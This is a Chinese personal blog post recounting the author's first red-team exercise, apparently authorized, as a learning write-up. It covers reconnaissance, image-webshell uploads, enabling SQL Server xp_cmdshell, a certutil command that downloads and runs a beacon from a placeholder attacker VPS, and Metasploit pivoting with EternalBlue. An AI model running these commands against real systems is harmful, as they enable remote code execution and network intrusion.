<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"www.xn--jpru96amjlpmr.top","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="​    3月19日终于回家了，在jx打了五天半的hvv，第一次实战，总结一下。 1.信息收集​    记录一下&#x3D;&#x3D;大陆彭法师&#x3D;&#x3D;赛前教我的信息收集方法(从主域名出发)： ###     1.1 icp备案查询  ICP&#x2F;IP地址&#x2F;域名信息备案管理系统 ​         ​        搜索域名后，根据主办单位和网站备案号，继续查询该域名相关域名。 ​         ​         1.">
<meta property="og:type" content="article">
<meta property="og:title" content="记录第一次hvv拉了满满一库">
<meta property="og:url" content="https://www.可爱挺萌.top/2021/03/20/%E8%AE%B0%E5%BD%95%E7%AC%AC%E4%B8%80%E6%AC%A1hvv%E6%8B%89%E4%BA%86%E6%BB%A1%E6%BB%A1%E4%B8%80%E5%BA%93/index.html">
<meta property="og:site_name" content="可爱挺萌">
<meta property="og:description" content="​    3月19日终于回家了，在jx打了五天半的hvv，第一次实战，总结一下。 1.信息收集​    记录一下&#x3D;&#x3D;大陆彭法师&#x3D;&#x3D;赛前教我的信息收集方法(从主域名出发)： ###     1.1 icp备案查询  ICP&#x2F;IP地址&#x2F;域名信息备案管理系统 ​         ​        搜索域名后，根据主办单位和网站备案号，继续查询该域名相关域名。 ​         ​         1.">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210320192000.png">
<meta property="article:published_time" content="2021-03-20T10:38:33.000Z">
<meta property="article:modified_time" content="2021-03-21T06:48:18.820Z">
<meta property="article:author" content="keaitm">
<meta property="article:tag" content="hw">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210320192000.png">

<link rel="canonical" href="https://www.可爱挺萌.top/2021/03/20/%E8%AE%B0%E5%BD%95%E7%AC%AC%E4%B8%80%E6%AC%A1hvv%E6%8B%89%E4%BA%86%E6%BB%A1%E6%BB%A1%E4%B8%80%E5%BA%93/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>记录第一次hvv拉了满满一库 | 可爱挺萌</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">可爱挺萌</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">可爱真tm萌</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://www.可爱挺萌.top/2021/03/20/%E8%AE%B0%E5%BD%95%E7%AC%AC%E4%B8%80%E6%AC%A1hvv%E6%8B%89%E4%BA%86%E6%BB%A1%E6%BB%A1%E4%B8%80%E5%BA%93/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="keaitm">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="可爱挺萌">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          记录第一次hvv拉了满满一库
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-03-20 18:38:33" itemprop="dateCreated datePublished" datetime="2021-03-20T18:38:33+08:00">2021-03-20</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-03-21 14:48:18" itemprop="dateModified" datetime="2021-03-21T14:48:18+08:00">2021-03-21</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>​    <code>3月19日终于回家了，在jx打了五天半的hvv，第一次实战，总结一下。</code></p>
<h2 id="1-信息收集"><a href="#1-信息收集" class="headerlink" title="1.信息收集"></a>1.信息收集</h2><p>​    记录一下==大陆彭法师==赛前教我的信息收集方法(从主域名出发)：</p>
<pre><code>###     1.1 icp备案查询
</code></pre>
<p><a target="_blank" rel="noopener" href="https://beian.miit.gov.cn/#/Integrated/recordQuery"><em>ICP</em>/IP地址/域名信息备案管理系统</a></p>
<p>​        <img src="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210320192000.png" alt="image-20210320191823236"></p>
<p>​        搜索域名后，根据主办单位和网站备案号，继续查询该域名相关域名。</p>
<p>​        </p>
<p>​        </p>
<h3 id="1-2-子域名收集"><a href="#1-2-子域名收集" class="headerlink" title="1.2 子域名收集"></a>1.2 子域名收集</h3><h4 id="1-2-1-搜索引擎（用法之后单开一章）"><a href="#1-2-1-搜索引擎（用法之后单开一章）" class="headerlink" title="1.2.1 搜索引擎（用法之后单开一章）"></a>1.2.1 搜索引擎（用法之后单开一章）</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">1.google,baidu等搜索引擎   语法:site:baidu.com、……</span><br><span class="line">2.fofa，zoomeye等网络空间测绘工具  </span><br><span class="line">	fofa https:&#x2F;&#x2F;fofa.so&#x2F;</span><br><span class="line">	zoomeye https:&#x2F;&#x2F;www.zoomeye.org&#x2F;</span><br><span class="line">	censys https:&#x2F;&#x2F;censys.io&#x2F;</span><br><span class="line">	shodan https:&#x2F;&#x2F;www.oshadan.com&#x2F;</span><br><span class="line">	国产傻蛋 https:&#x2F;&#x2F;www.shodan.io&#x2F;</span><br></pre></td></tr></table></figure>



<h4 id="1-2-2子域名查询工具"><a href="#1-2-2子域名查询工具" class="headerlink" title="1.2.2子域名查询工具"></a>1.2.2子域名查询工具</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">Layer子域名挖掘机</span><br><span class="line">wydomain  https:&#x2F;&#x2F;github.com&#x2F;ring04h&#x2F;wydomain    </span><br><span class="line">subDomainsBrute  https:&#x2F;&#x2F;github.com&#x2F;lijiejie&#x2F;</span><br><span class="line">oneforall  https:&#x2F;&#x2F;github.com&#x2F;shmilylty&#x2F;OneForAll</span><br></pre></td></tr></table></figure>



<h4 id="1-2-3其他方法"><a href="#1-2-3其他方法" class="headerlink" title="1.2.3其他方法"></a>1.2.3其他方法</h4><p>​            dns爆破、ssl/https证书查询等、ip反查dns。</p>
<h3 id="1-3目标相关收集"><a href="#1-3目标相关收集" class="headerlink" title="1.3目标相关收集"></a>1.3目标相关收集</h3><h4 id="1-3-1在线方式"><a href="#1-3-1在线方式" class="headerlink" title="1.3.1在线方式"></a>1.3.1在线方式</h4><p>​        这次主要用了fofa，因为有高级会员：</p>
<p>​        a.ip查询同服务器服务</p>
<p>​        b.查询title，body关键词</p>
<p>​        c.同单位网段可能是连号  11.11.11.0/24 网段查询</p>
<p>​        d.直接查域名</p>
<p>​        e.点网站图标</p>
<h4 id="1-3-2其他"><a href="#1-3-2其他" class="headerlink" title="1.3.2其他"></a>1.3.2其他</h4><p>​        a.1-65535端口扫描，一个个看</p>
<p>​        b.网站可能使用了某种存在漏洞的框架、 系统 如：低版本的weblogic、致远oa等</p>
<p>​        c.whois查询</p>
<h3 id="1-4单站点信息"><a href="#1-4单站点信息" class="headerlink" title="1.4单站点信息"></a>1.4单站点信息</h3><h4 id="1-4-1-真实ip查询"><a href="#1-4-1-真实ip查询" class="headerlink" title="1.4.1 真实ip查询"></a>1.4.1 真实ip查询</h4><p>​        全球ping、邮件、旁站子站、若不久上的cdn直接dns可能能查到。</p>
<h4 id="1-4-2目录扫描、敏感信息泄露"><a href="#1-4-2目录扫描、敏感信息泄露" class="headerlink" title="1.4.2目录扫描、敏感信息泄露"></a>1.4.2目录扫描、敏感信息泄露</h4><p>​        员工个人信息、waf、登陆点、后台、历史未删除页面、物理路径、源码备份、可用于社工的信息泄露。</p>
<h3 id="1-5下级单位信息搜集"><a href="#1-5下级单位信息搜集" class="headerlink" title="1.5下级单位信息搜集"></a>1.5下级单位信息搜集</h3><p>​    如政府部门下属部门，大公司的子公司</p>
<h2 id="2-文件上传"><a href="#2-文件上传" class="headerlink" title="2.文件上传"></a>2.文件上传</h2><p>记录一下遇到的文件上传</p>
<h3 id="2-1-前端校验后缀，后段校验文件内图片特征"><a href="#2-1-前端校验后缀，后段校验文件内图片特征" class="headerlink" title="2.1 前端校验后缀，后段校验文件内图片特征"></a>2.1 前端校验后缀，后段校验文件内图片特征</h3><p>制作图片马，木马代码段位于图片乱码之后，bp抓包上传</p>
<h3 id="2-2数据库上传"><a href="#2-2数据库上传" class="headerlink" title="2.2数据库上传"></a>2.2数据库上传</h3><p>遇到了sql server，找到了几台的用户/密码，==剑仙==教的开xp_cmdshell，下马上线：</p>
<p>1、开启xp_cmdshell：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">sp_configure <span class="string">&#x27;show advanced options&#x27;</span>,<span class="number">1</span></span><br><span class="line">reconfigure</span><br><span class="line">go</span><br><span class="line">sp_configure <span class="string">&#x27;xp_cmdshell&#x27;</span>,<span class="number">1</span></span><br><span class="line">reconfigure</span><br><span class="line">go</span><br></pre></td></tr></table></figure>



<p>2、服务器开http服务，数据库下马：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 -m http.server <span class="number">8000</span></span><br></pre></td></tr></table></figure>



<p>3、数据库执行xp_cmdshell，下马上线：</p>
<p>下载到有权限的文件夹，执行：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">exec</span> xp_cmdshell &quot;certutil.exe -urlcache -split -f http://vps_ip:vps_port/beacon.exe c:\temp\a.exe&quot;</span><br></pre></td></tr></table></figure>

<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">exec</span> xp_cmdshell <span class="string">&#x27;c:\temp\a.exe&#x27;</span></span><br></pre></td></tr></table></figure>

<p>成功即上线。</p>
<h2 id="3-内网"><a href="#3-内网" class="headerlink" title="3.内网"></a>3.内网</h2><h3 id="3-1msf"><a href="#3-1msf" class="headerlink" title="3.1msf"></a>3.1msf</h3><p>1、msfvenom</p>
<p><code> msfvenom -p payload -a 架构 --platform 平台 lhost=vps_ip port=vps_port -f 格式 -o 文件名 -e 编码</code></p>
<p>1、autoroute</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">meterpreter&gt;&gt; autoroute -s 11.11.11.0&#x2F;24 &#x2F;&#x2F;获得一个相当于内网代理的路由</span><br><span class="line"></span><br><span class="line">-p  &#x2F;&#x2F;查看路由配置</span><br><span class="line">-d -s 11.11.11.0&#x2F;24  &#x2F;&#x2F;删除该网段路由</span><br><span class="line"></span><br><span class="line">meterpreter&gt;&gt; background  &#x2F;&#x2F;session 放到后台</span><br></pre></td></tr></table></figure>



<p>2、portscan</p>
<p>3、ms17_010</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">use exploit&#x2F;windows&#x2F;smb&#x2F;ms17_010_eternalblue</span><br></pre></td></tr></table></figure>

<p>设置rhosts就能用了，用之前建议扫一扫</p>
<p><code>use auxiliary/scanner/smb/smb_ms17_010</code></p>
<p>4、portfwd</p>
<p><code> meterpreter&gt;&gt; portfwd add -l 本机监听 -p 目标端口 -r 目标ip</code></p>
<p>直接访问原本无法访问的目标机端口</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/hw/" rel="tag"># hw</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/03/20/hello-world/" rel="prev" title="Hello World">
      <i class="fa fa-chevron-left"></i> Hello World
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/04/03/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83%E5%90%88%E9%9B%86/" rel="next" title="数据库提权合集">
      数据库提权合集 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-number">1.</span> <span class="nav-text">1.信息收集</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-2-%E5%AD%90%E5%9F%9F%E5%90%8D%E6%94%B6%E9%9B%86"><span class="nav-number">1.1.</span> <span class="nav-text">1.2 子域名收集</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-2-1-%E6%90%9C%E7%B4%A2%E5%BC%95%E6%93%8E%EF%BC%88%E7%94%A8%E6%B3%95%E4%B9%8B%E5%90%8E%E5%8D%95%E5%BC%80%E4%B8%80%E7%AB%A0%EF%BC%89"><span class="nav-number">1.1.1.</span> <span class="nav-text">1.2.1 搜索引擎（用法之后单开一章）</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#1-2-2%E5%AD%90%E5%9F%9F%E5%90%8D%E6%9F%A5%E8%AF%A2%E5%B7%A5%E5%85%B7"><span class="nav-number">1.1.2.</span> <span class="nav-text">1.2.2子域名查询工具</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#1-2-3%E5%85%B6%E4%BB%96%E6%96%B9%E6%B3%95"><span class="nav-number">1.1.3.</span> <span class="nav-text">1.2.3其他方法</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-3%E7%9B%AE%E6%A0%87%E7%9B%B8%E5%85%B3%E6%94%B6%E9%9B%86"><span class="nav-number">1.2.</span> <span class="nav-text">1.3目标相关收集</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-3-1%E5%9C%A8%E7%BA%BF%E6%96%B9%E5%BC%8F"><span class="nav-number">1.2.1.</span> <span class="nav-text">1.3.1在线方式</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#1-3-2%E5%85%B6%E4%BB%96"><span class="nav-number">1.2.2.</span> <span class="nav-text">1.3.2其他</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-4%E5%8D%95%E7%AB%99%E7%82%B9%E4%BF%A1%E6%81%AF"><span class="nav-number">1.3.</span> <span class="nav-text">1.4单站点信息</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-4-1-%E7%9C%9F%E5%AE%9Eip%E6%9F%A5%E8%AF%A2"><span class="nav-number">1.3.1.</span> <span class="nav-text">1.4.1 真实ip查询</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#1-4-2%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F%E3%80%81%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2"><span class="nav-number">1.3.2.</span> <span class="nav-text">1.4.2目录扫描、敏感信息泄露</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-5%E4%B8%8B%E7%BA%A7%E5%8D%95%E4%BD%8D%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86"><span class="nav-number">1.4.</span> <span class="nav-text">1.5下级单位信息搜集</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0"><span class="nav-number">2.</span> <span class="nav-text">2.文件上传</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#2-1-%E5%89%8D%E7%AB%AF%E6%A0%A1%E9%AA%8C%E5%90%8E%E7%BC%80%EF%BC%8C%E5%90%8E%E6%AE%B5%E6%A0%A1%E9%AA%8C%E6%96%87%E4%BB%B6%E5%86%85%E5%9B%BE%E7%89%87%E7%89%B9%E5%BE%81"><span class="nav-number">2.1.</span> <span class="nav-text">2.1 前端校验后缀，后段校验文件内图片特征</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-2%E6%95%B0%E6%8D%AE%E5%BA%93%E4%B8%8A%E4%BC%A0"><span class="nav-number">2.2.</span> <span class="nav-text">2.2数据库上传</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-%E5%86%85%E7%BD%91"><span class="nav-number">3.</span> <span class="nav-text">3.内网</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#3-1msf"><span class="nav-number">3.1.</span> <span class="nav-text">3.1msf</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">keaitm</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">3</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">keaitm</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
